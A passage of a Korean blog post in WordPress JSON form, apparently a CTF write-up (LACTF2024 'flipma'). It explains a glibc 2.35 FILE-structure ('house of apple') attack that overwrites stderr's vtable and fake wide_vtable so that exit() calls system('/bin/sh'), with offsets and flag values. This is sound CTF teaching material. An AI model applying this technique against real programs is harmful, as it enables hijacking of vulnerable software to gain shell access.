\uc788\ub2e4\uba74, \ub2e4\uc74c\uacfc \uac19\uc740 \ud638\ucd9c \uccb4\uc778\uc774 \ubc1c\uc0dd\ud560 \uc218 \uc788\uc2b5\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\uc544\ub798\ub294 \uadf8 \ud638\ucd9c \uccb4\uc778\uc785\ub2c8\ub2e4:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">Assuming that we overwrite the FILE->vtable from _IO_file_jumps to _IO_wfile_jumps. When the binary try to call\n_IO_OVERFLOW (fp, EOF), the chain would be:\n\n_IO_OVERFLOW (fp, EOF)\n|_ JUMP1 (__overflow, fp, EOF)\n   |_ (_IO_JUMPS_FUNC(fp)->__overflow) (fp, EOF)\n      |_ ((IO_validate_vtable (_IO_JUMPS_FILE_plus (fp)))->__overflow) (fp, EOF) &lt;- Because we overwrite it to point to _IO_wfile_jumps, it will call _IO_wfile_overflow instead of _IO_new_file_overflow. This is still valid because its location is still in the correct region\n         |_ _IO_wfile_overflow(fp, EOF)\n            |_ _IO_wdoallocbuf(fp)\n               |_ _IO_WDOALLOCATE(fp)\n                  |_ WJUMP0 (__doallocate, fp)\n                     |_ (_IO_WIDE_JUMPS_FUNC(fp)->__doallocate) (fp)\n                         |_ (_IO_WIDE_JUMPS(fp)->__doallocate) (fp) &lt;- No Validation #profit :D\n<\/pre>\n\n\n\n<p>\uc774 \ud638\ucd9c\uc744 \ub2ec\uc131\ud558\uae30 \uc704\ud574\uc11c\ub294 \ub2e4\uc74c\uacfc \uac19\uc740 <strong>\uc81c\uc57d \uc870\uac74\ub4e4\uc744 \ub9cc\uc871<\/strong>\ud574\uc57c \ud569\ub2c8\ub2e4:<\/p>\n\n\n\n<p>\ud83d\udd39 <strong><code>_IO_wfile_overflow<\/code> \ud568\uc218 \ub0b4\ubd80\uc5d0\uc11c <code>_IO_wdoallocbuf<\/code>\ub97c \ud638\ucd9c\ud558\ub3c4\ub85d \ud558\ub824\uba74 \ub2e4\uc74c \uc870\uac74\ub4e4\uc744 \ud1b5\uacfc\ud574\uc57c \ud569\ub2c8\ub2e4:<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>if (f-&gt;_flags &amp; _IO_NO_WRITES)<\/code> \u2192 **<code>False<\/code>*\ub97c \ubc18\ud658\ud574\uc57c \ud568<\/li>\n\n\n\n<li><code>if ((f-&gt;_flags &amp; _IO_CURRENTLY_PUTTING) == 0)<\/code> \u2192 **<code>True<\/code>*\ub97c \ubc18\ud658\ud574\uc57c \ud568<\/li>\n\n\n\n<li><code>if (f-&gt;_wide_data-&gt;_IO_write_base == 0)<\/code> \u2192 **<code>True<\/code>*\ub97c \ubc18\ud658\ud574\uc57c \ud568<\/li>\n<\/ul>\n\n\n\n<p>\ud83d\udd39 <strong><code>_IO_wdoallocbuf<\/code> \ud568\uc218 \ub0b4\ubd80\uc5d0\uc11c <code>_IO_WDOALLOCATE<\/code> \ud638\ucd9c\ub85c \uc9c4\uc785\ud558\ub824\uba74 \ub2e4\uc74c \uc870\uac74\ub4e4\uc744 \ub9cc\uc871\ud574\uc57c \ud568:<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>if (fp-&gt;_wide_data-&gt;_IO_buf_base)<\/code> \u2192 **<code>False<\/code>*\ub97c \ubc18\ud658\ud574\uc57c \ud568<\/li>\n\n\n\n<li><code>if (!(fp-&gt;_flags &amp; _IO_UNBUFFERED))<\/code> \u2192 **<code>True<\/code>*\ub97c \ubc18\ud658\ud574\uc57c \ud568<\/li>\n<\/ul>\n\n\n\n<p>\u203b <code>IO_UNBUFFERED<\/code>\uc758 \uac12\uc740 <code>0x0002<\/code>\uc774\ubbc0\ub85c, \uacb0\uad6d <code>fp-&gt;_flags &amp; _IO_UNBUFFERED == 0<\/code> \uc774\uc5b4\uc57c \uc870\uac74\uc744 \ub9cc\uc871\ud568<\/p>\n\n\n\n<p>\uc774 \ubaa8\ub4e0 \uc870\uac74\uc744 \ucda9\uc871\ud558\uac8c \ub418\uba74,<\/p>\n\n\n\n<p>**<code>fp-&gt;_wide_data-&gt;wide_vtable-&gt;__doallocate<\/code>**\uc5d0 \uc800\uc7a5\ub41c \ud3ec\uc778\ud130\ub85c \uc810\ud504\ud558\uac8c \ub418\uba70,<\/p>\n\n\n\n<p>\uc774\ub54c <strong><code>rdi<\/code>\ub294 FILE \uad6c\uc870\uccb4 \uc790\uccb4(fp)\ub97c \uac00\ub9ac\ud0a4\ub294 \ud3ec\uc778\ud130<\/strong>\uac00 \ub429\ub2c8\ub2e4.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>\ub530\ub77c\uc11c, glibc 2.35\uc5d0\uc11c\ub3c4 \ub2e4\uc74c\uacfc \uac19\uc740 \ubc29\uc2dd\uc73c\ub85c FILE \uad6c\uc870\uccb4 \uacf5\uaca9 \uacbd\ub85c\ub97c \uad6c\uc131\ud560 \uc218 \uc788\uc2b5\ub2c8\ub2e4:<\/p>\n\n\n\n<p>\uc608\ub97c \ub4e4\uc5b4, \uc6b0\ub9ac\uac00 \uac00\uc9dc <code>wide_vtable<\/code>\uc744 \ub9cc\ub4e4\uc5b4\uc11c <code>__doallocate<\/code> \ud56d\ubaa9\uc774 <code>system<\/code>\uc744 \uac00\ub9ac\ud0a4\ub3c4\ub85d \uc124\uc815\ud55c\ub2e4\uba74,<\/p>\n\n\n\n<p><code>_IO_WDOALLOCATE(fp)<\/code>\uac00 \ud638\ucd9c\ub420 \ub54c **<code>system(fp)<\/code>**\ub97c \uc2e4\ud589\ud558\uac8c \ub429\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\uadf8\ub9ac\uace0 \uc6b0\ub9ac\uac00 <code>fp<\/code>\uc758 \ub0b4\uc6a9\uc744 \uc870\uc791\ud574\uc11c <code>\"sh\"<\/code>\ub97c \uc2e4\ud589\ud558\ub3c4\ub85d \uad6c\uc131\ud574\ub450\uba74,<\/p>\n\n\n\n<p><strong>\uc178\uc744 \ud68d\ub4dd\ud558\uac8c \ub418\ub294 \uac83<\/strong>\uc785\ub2c8\ub2e4! \ud83d\ude04<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>\ud558\uc9c0\ub9cc \uba3c\uc800 \ud574\uacb0\ud574\uc57c \ud560 \ubb38\uc81c\uac00 \ud558\ub098 \uc788\uc2b5\ub2c8\ub2e4:<\/p>\n\n\n\n<p><strong>\uc5b4\ub5bb\uac8c <code>_IO_OVERFLOW<\/code>\ub97c \ud2b8\ub9ac\uac70\ud560 \uc218 \uc788\uc744\uae4c\uc694?<\/strong><\/p>\n\n\n\n<p>\uc774 \ubd80\ubd84\uc740 \ubc14\uc774\ub108\ub9ac\uc758 <strong>\uc138 \ubc88\uc9f8 \uba54\ub274 \ud56d\ubaa9\uc778 exit \uae30\ub2a5\uc744 \uc545\uc6a9<\/strong>\ud568\uc73c\ub85c\uc368 \uac00\ub2a5\ud569\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\uc774\uc640 \uad00\ub828\ub41c \uc790\uc138\ud55c \ud638\ucd9c \uccb4\uc778 \ub0b4\uc6a9\uc740 \uc81c\uac00 \uc774\uc804\uc5d0 \uc791\uc131\ud55c <strong>FILE \uad6c\uc870\uccb4 \uacf5\uaca9\uc5d0 \uad00\ud55c \uae00<\/strong>\uc5d0\uc11c \ud655\uc778\ud560 \uc218 \uc788\uc2b5\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\uac04\ub2e8\ud788 \uc694\uc57d\ud558\uc790\uba74, exit\uc744 \ud638\ucd9c\ud558\uba74 \ubc14\uc774\ub108\ub9ac\ub294 \ub2e4\uc74c\uacfc \uac19\uc740 \ud568\uc218 \ud638\ucd9c \uccb4\uc778\uc744 \ub530\ub77c\uac00\uac8c \ub429\ub2c8\ub2e4:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">exit\n|_ _IO_cleanup\n   |_ _IO_flush_all_lockp\n      Iterate list of available files (stderr->stdout->stdin), and on each iteration it will call:\n      |_ _IO_OVERFLOW (fp, EOF)<\/pre>\n\n\n\n<p>\ub2e4\uc74c\uc740 <code>_IO_OVERFLOW<\/code>\ub97c \ud638\ucd9c\ud558\uae30 \uc704\ud55c \uc870\uac74\uc785\ub2c8\ub2e4 (<code>_IO_flush_all_lockp<\/code> \ucf54\ub4dc\uc5d0\uc11c \ubc1c\ucdcc):<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>if (((fp-&gt;_mode &lt;= 0 &amp;&amp; fp-&gt;_IO_write_ptr &gt; fp-&gt;_IO_write_base))<\/code>\n<ul class=\"wp-block-list\">\n<li>\uc989, \uc6b0\ub9ac\ub294 <code>_mode<\/code>\ub97c <code>0<\/code>\uc73c\ub85c \uc124\uc815\ud558\uace0, <code>_IO_write_ptr &gt; _IO_write_base<\/code> \uc870\uac74\uc744 \ub9cc\uc871\uc2dc\ucf1c\uc57c \ud569\ub2c8\ub2e4.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p><code>exit()<\/code> \ud638\ucd9c \uc2dc \ubaa8\ub4e0 \uc5f4\ub9b0 \ud30c\uc77c\ub4e4\uc744 \uc21c\ud68c\ud558\uac8c \ub418\ubbc0\ub85c,<\/p>\n\n\n\n<p><strong>OOB(out-of-bound) write \ubc84\uadf8\ub97c \uc774\uc6a9\ud574 <code>stderr<\/code> \ud30c\uc77c \uad6c\uc870\uccb4\ub97c \ub36e\uc5b4\uc4f0\uae30<\/strong>\ub85c \uc120\ud0dd\ud588\uc2b5\ub2c8\ub2e4.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">RCE\ub97c \uc5bb\uae30 \uc704\ud574 <code>stderr<\/code> \uad6c\uc870\uccb4\uc5d0 \uc801\uc6a9\ud574\uc57c \ud560 \uc124\uc815 \uc694\uc57d:<\/h3>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">1. \uac00\uc9dc <code>_wide_vtable<\/code> \uc0dd\uc131<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\uc704\uce58: <code>chunk_addr + 0x100<\/code> \u203b <code>chunk_addr<\/code>\ub294 <code>libc_base - 0xf7ff0<\/code> \uc704\uce58\uc5d0 \uc788\uc74c<\/li>\n\n\n\n<li><code>__doallocate<\/code>\uc758 \uc624\ud504\uc14b\uc740 <code>0x68<\/code>\uc774\ubbc0\ub85c, <code>chunk_addr + 0x100 + 0x68<\/code>\uc5d0 <code>system<\/code> \uc8fc\uc18c\ub97c \uc800\uc7a5<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">2. \uac00\uc9dc <code>_wide_data<\/code> \uc0dd\uc131<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\uc704\uce58: <code>chunk_addr<\/code><\/li>\n\n\n\n<li><code>chunk_addr-&gt;_IO_write_base<\/code> \u2192 <code>0<\/code>\uc73c\ub85c \uc124\uc815<\/li>\n\n\n\n<li><code>chunk_addr-&gt;_IO_buf_base<\/code> \u2192 <code>0<\/code>\uc73c\ub85c \uc124\uc815<\/li>\n\n\n\n<li><code>chunk_addr-&gt;_wide_vtable<\/code> \u2192 <code>chunk_addr + 0x100<\/code> (\uac00\uc9dc vtable\uc758 \uc8fc\uc18c)<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">3. <code>stderr-&gt;_flags<\/code> \uac12\uc744 \uc801\uc808\ud788 \uc124\uc815<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\uc911\uc694 \uc0ac\ud56d:\n<ul class=\"wp-block-list\">\n<li>\ub9c8\uc9c0\ub9c9\uc5d0 <code>wide_vtable-&gt;__doallocate(stderr)<\/code> \u2192 <code>system(stderr)<\/code>\uc774 \ud638\ucd9c\ub428<\/li>\n\n\n\n<li>\uc989, <code>system<\/code>\uc758 \uc778\uc790\ub85c\ub294 <code>stderr-&gt;_flags<\/code>\uac00 \ubb38\uc790\uc5f4 \uc2dc\uc791 \uc8fc\uc18c\ub85c \uc0ac\uc6a9\ub428<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>\uc870\uac74\ub3c4 \ub9cc\uc871\ud558\uba74\uc11c \uc6d0\ud558\ub294 \uba85\ub839\uc744 \uc2e4\ud589\uc2dc\ud0a4\uae30 \uc704\ud55c \ud2b8\ub9ad:\n<ul class=\"wp-block-list\">\n<li><strong>kylebot<\/strong> \ubc29\uc2dd:\n<ul class=\"wp-block-list\">\n<li><code>_flags<\/code>\uc5d0 <code>0x3b01010101010101<\/code> \uc124\uc815<\/li>\n\n\n\n<li><code>_IO_read_ptr<\/code>\uc5d0 <code>\"\/bin\/sh\\\\x00\"<\/code> \uc800\uc7a5<\/li>\n\n\n\n<li>\uc774 \uacbd\uc6b0 \ucd5c\uc885\uc801\uc73c\ub85c \uc2e4\ud589\ub418\ub294 \uba85\ub839\uc740 <code>system(\"\\\\x01\\\\x01\\\\x01\\\\x01\\\\x01\\\\x01\\\\x01;\/bin\/sh\")<\/code> \u2192 \uc258 \uc2e4\ud589 \uac00\ub2a5<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>roderick01<\/strong> \ubc29\uc2dd:\n<ul class=\"wp-block-list\">\n<li><code>_flags<\/code>\uc5d0 <code>\" sh\"<\/code> (\uc55e\uc5d0 \uacf5\ubc31 2\uac1c \ud3ec\ud568\ub41c \ubb38\uc790\uc5f4) \uc124\uc815<\/li>\n\n\n\n<li>\uc870\uac74 \ub9cc\uc871 + <code>system(\" sh\")<\/code> \ud638\ucd9c\ub428<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">4. \uae30\ud0c0 <code>stderr<\/code> \ud544\ub4dc \uc124\uc815<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>_IO_write_base<\/code> \u2192 <code>0<\/code><\/li>\n\n\n\n<li><code>_IO_write_ptr<\/code> \u2192 <code>1<\/code>\n<ul class=\"wp-block-list\">\n<li>\uc774\ub85c \uc778\ud574 <code>exit()<\/code> \ud638\ucd9c \uc2dc <code>_IO_flush_all_lockp()<\/code>\uac00 <code>stderr<\/code>\uc5d0 \ub300\ud574 <code>_IO_OVERFLOW(stderr, EOF)<\/code> \ud638\ucd9c<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><code>stderr-&gt;vtable<\/code> \u2192 <code>_IO_wfile_jumps<\/code>\ub85c \uc124\uc815\n<ul class=\"wp-block-list\">\n<li>\uc774\ub85c \uc778\ud574 \uc6d0\ub798 <code>_IO_new_file_overflow<\/code> \ub300\uc2e0 <code>_IO_wfile_overflow<\/code> \ud638\ucd9c\ub428<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>\uc774\ucc98\ub7fc <code>stderr<\/code>\uc758 FILE \uad6c\uc870\uccb4\ub97c \uc131\uacf5\uc801\uc73c\ub85c \uc870\uc791\ud558\uace0 \ub098\uba74,<\/p>\n\n\n\n<p><strong><code>exit()<\/code> \ud638\ucd9c \uc2dc \uc790\ub3d9\uc73c\ub85c \uc178\uc744 \ud68d\ub4dd<\/strong>\ud560 \uc218 \uc788\uac8c \ub429\ub2c8\ub2e4!<\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>checksec Docker configure Dropbear\/gdbserver in Docker static \ube4c\ub4dc gdb, gdbserver, dropbearmulti \ub2e4\uc6b4\ub85c\ub4dc \ub9c1\ud06chttps:\/\/github.com\/guyush1\/gdb-static\/releases\/tag\/v16.2-statichttps:\/\/bitfab.org\/dropbear-static-builds Running prob in Docker Decompile src main flips\uc758 \uac12\uc5d0 \ub530\ub77c \uacc4\uc18d flip\uc744 \ud638\ucd9c\ud560 \uc218 \uc788\uc74c. flip flip \ud568\uc218\ub97c \ud638\ucd9c\ud560\ub54c\ub9c8\ub2e4 \ub9c8\uc9c0\ub9c9\uc5d0 flips\uc218\ub97c \uac10\uc18c\ud568. \uc804\uc5ed\ubcc0\uc218\uc778 flips \ucd08\uae30\uac12\uc740 4\uc774\ubbc0\ub85c, \ucd1d 4\ubc88 \ud638\ucd9c\uac00\ub2a5. \uac01\uac01 a, b \uac12\uc744 v1, v2\uc5d0 \ub2f4\uc74c. stdin-&gt;_flags\uc758 \ud3ec\uc778\ud130\uc5d0 v1 \uac12\uc744 \ub354\ud55c \ub4a4,&hellip;&nbsp;<a href=\"https:\/\/h4ck.kr\/?p=3359\" rel=\"bookmark\">\ub354 \ubcf4\uae30 &raquo;<span class=\"screen-reader-text\">[LACTF2024] flipma<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[19],"tags":[33,49,25],"class_list":["post-3359","post","type-post","status-publish","format-standard","hentry","category-ctf-private","tag-fsop","tag-house-of-apple","tag-pwnable"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3359","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3359"}],"version-history":[{"count":4,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3359\/revisions"}],"predecessor-version":[{"id":3365,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3359\/revisions\/3365"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3359"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3359"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3359"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}